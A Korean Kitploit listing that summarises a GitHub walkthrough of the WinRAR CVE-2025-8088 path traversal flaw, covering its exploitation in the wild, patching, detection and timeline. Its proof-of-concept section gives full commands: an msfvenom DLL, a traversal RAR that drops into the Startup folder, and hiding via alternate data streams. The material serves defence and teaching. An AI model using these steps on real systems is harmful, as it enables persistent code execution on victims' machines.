Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal — WinRAR CVE-2025-8088을 발견, 패치, 보안 강화하는 과정을 실습 해커의 시각으로 흥미롭게 풀어낸 워크스루입니다. | Kitploit
도구/GitHubGitHub/adityabhatt3010/cve-2025-8088-winrar-zero-day-path-traversal
Vulnerability AnalysisExploitationWeb Application ExploitationForensicsMalware AnalysisPenetration TestingThreat IntelligenceLearning & EducationIncident Response

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
GitHubadityabhatt3010/cve-2025-8088-winrar-zero-day-path-traversal

CVE-2025-8088-WinRAR-Zero-Day-Path-Traversal

WinRAR CVE-2025-8088을 발견, 패치, 보안 강화하는 과정을 실습 해커의 시각으로 흥미롭게 풀어낸 워크스루입니다.

저장소 보기
1211개월 전아직 검토되지 않음

CVE-2025-8088: WinRAR 제로데이 경로 탐색 — 제로에서 Pwn까지 🗿


소개 – '오랜 친구'가 방심한 틈을 타다

WinRAR — 모두가 설치했지만 아무도 업데이트하지 않는 먼지 쌓인 고전 — 에게 고심각도 제로데이인 CVE-2025-8088이 적발되었습니다.

  • 심각도: CVSS v3.1 → 8.8 (높음)
  • 실제 공격에 악용됨: RomCom(Storm-0978) 및 Paper Werewolf와 같은 위협 행위자에 의해.
  • 패치 버전: WinRAR 7.13 (2025년 7월 30일 출시)
  • 7.12 이하를 사용 중이라면 — 당신은 무방비 상태입니다.

CISA는 이를 Known Exploited Vulnerabilities 카탈로그에 등록했으며, 연방 기관의 패치 기한을 2025년 9월 2일로 설정했습니다. 이는 단순한 이론이 아닙니다 — 실제 공격이 발생하고 있습니다.

Cover


버그는 무엇인가요? 🧩

  • 유형: 경로 탐색 (디렉토리 트래버설)
  • 변종: ADS(Alternate Data Streams)를 사용하여 페이로드를 숨김
  • 영향: 악성 RAR 파일이 의도한 폴더 밖으로 파일을 추출할 수 있음 — 예: ..\Startup\evil.dll
  • 결과: 임의 파일 배치 → 지속성 → 백도어 → RAT 행위.

영향을 받는 버전: Windows용 WinRAR (≤7.12), UnRAR.dll, Portable UnRAR 안전한 버전: Linux, Unix, Android 빌드.


먼저 할 일 — 취약한가요? 🕵️‍♂️

당황하거나 해커 흉내를 내기 전에 버전을 확인하세요.

확인 방법:

  • GUI: WinRAR 열기 → 도움말 → WinRAR 정보
  • CMD/Powershell:
root@kitploit:~
winget list WinRAR

(또는 설치 디렉토리에서 winrar.exe 실행)

  • DLL 확인: UnRAR.dll 우클릭 → 속성 → 자세히.

이 글을 쓰기 시작했을 때 저는 7.10을 사용 중이었습니다 — 네, 딱 좋은 표적이었죠 🗿🐔🍗.

WinRAR_버전


패치하는 방법 (누군가 당신을 해킹하기 전에) 🛡️

  1. 최신 버전 다운로드: rarlab.com/download.htm
  2. 시스템에 맞게 64비트 또는 32비트를 선택하세요.
  3. 설치 프로그램 실행 → 기존 빌드를 덮어씁니다.
  4. 확인: 도움말 → WinRAR 정보 → 7.13 이상이어야 합니다.
  5. 종속 도구에 UnRAR.dll이 있다면 교체하세요.

WinRAR은 자동 업데이트되지 않습니다 — 캘린더 알림을 설정하고 정적인 표적이 되지 마세요.

WinRAR_버전_업데이트됨

추신: 여기 내 배경화면 자랑은 무시하세요 — 좀 과시하고 싶었어요! 😏


실제 악용 사례 ⚔️

  • RomCom (Storm-0978): 스피어 피싱 채용 지원 미끼, 우크라이나 관련 표적.
  • Paper Werewolf: 얼마 지나지 않아 합류, 러시아 조직 표적.
  • 전달된 페이로드: SnipBot, RustyClaw, Mythic Agent 변종.
  • 악성 DLL/LNK를 %TEMP% 및 시작 폴더에 드롭.
  • CISA가 2025년 8월 12일에 등록 → 기한: 2025년 9월 2일.

개념 증명 (PoC) – 통제된 실험실에서만! 🧨

⚠ 면책: 이 정보는 교육 및 승인된 보안 테스트 전용입니다. 무분별하게 사용하지 마세요 🗿.

1단계: 악성 DLL 생성

root@kitploit:~
msfvenom -p windows/x64/exec CMD=calc.exe -f dll > evil.dll

2단계: 트래버설 RAR 제작

root@kitploit:~
winrar a -ep -ap"\\..\\..\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\" payload.rar evil.dll

3단계: (선택사항) ADS 은닉

root@kitploit:~
type evil.dll > legit.txt:evil.dll

4단계: 취약한 WinRAR로 추출

짜잔 — evil.dll이 시작 폴더에 들어갑니다. 다음 재부팅? Hello calc.exe.

워크플로우


완화 및 탐지 🐺

  • 패치 → WinRAR 7.13+

  • 다음 경로에서 의심스러운 .dll 또는 .lnk 찾기:

    • %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup
    • %TEMP%
  • ADS 모니터링:

    root@kitploit:~
    streams.exe -s C:\
    
  • IDS/IPS 규칙: ..\ 시퀀스가 포함된 RAR 플래그 지정.

  • Nessus/Qualys 플러그인 이미 배포됨.


주요 타임라인

  • 2025년 7월 18일 – ESET, 실제 악용 발견
  • 2025년 7월 30일 – 패치 출시 (7.13)
  • 2025년 8월 12일 – CISA KEV 카탈로그에 추가
  • 2025년 9월 2일 – 연방 기관 필수 패치 기한

마지막 말 – 패치하거나 사라지거나 🗿

이번 취약점은 "언젠가 발생할지도" 모르는 결함이 아니었습니다 — 공개 전에 이미 무기화되었습니다. 여전히 7.10을 사용 중이라면 (이 글을 쓸 때 저처럼) 지금 패치하세요. 만약 레드팀 쪽에 있다면, 이 사례를 오래된 도구가 새로운 공격 벡터가 되는 방법에 대한 사례 연구로 활용하세요.

도구 다운로드